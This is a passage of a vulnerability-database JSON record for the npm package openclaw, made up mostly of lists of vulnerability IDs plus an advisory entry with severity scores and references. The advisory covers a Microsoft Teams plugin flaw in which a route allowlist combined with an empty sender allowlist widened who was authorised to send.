s-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["GHSA-36cp-mh65-x882"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-eaaf-8rfa-f3hz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50901?format=json","vulnerability_id":"VCID-ebwd-3xp4-7fdp","summary":"OpenClaw's MS Teams sender allowlist bypass when route allowlist is configured and sender allowlist is empty\nOpenClaw's Microsoft Teams plugin widened group sender authorization when a team/channel route allowlist was configured but `groupAllowFrom` was empty. Before the fix, a matching route allowlist entry could cause the message handler to synthesize wildcard sender authorization for that route, allowing any sender in the matched team/channel to bypass the intended `groupPolicy: \"allowlist\"` sender check.\n\nThis does not affect default unauthenticated access, but it does weaken a documented Teams group authorization boundary and can allow unauthorized group senders to trigger replies in allowlisted Teams routes.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34506","reference_id":"","reference_type":"","scores":[{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01537","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01544","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00013","scoring_system":"epss","scoring_elements":"0.02193","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34506"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/88aee9161e0e6d32e810a25711e32a808a1777b2","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:56:56Z/"}],"url":"https://github.com/openclaw/openclaw/commit/88aee9161e0e6d32e810a25711e32a808a1777b2"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-sender-allowlist-bypass-in-microsoft-teams-plugin-via-route-allowlist-configuration","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:56:56Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-sender-allowlist-bypass-in-microsoft-teams-plugin-via-route-allowlist-configuration"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34506","reference_id":"CVE-2026-34506","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34506"},{"reference_url":"https://github.com/advisories/GHSA-g7cr-9h7q-4qxq","reference_id":"GHSA-g7cr-9h7q-4qxq","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-g7cr-9h7q-4qxq"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-g7cr-9h7q-4qxq","reference_id":"GHSA-g7cr-9h7q-4qxq","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:56:56Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-g7cr-9h7q-4qxq"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74859?format=json","purl":"pkg:npm/openclaw@2026.3.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-54mc-t5s7-wyes"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkjm-wcmt-43br"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID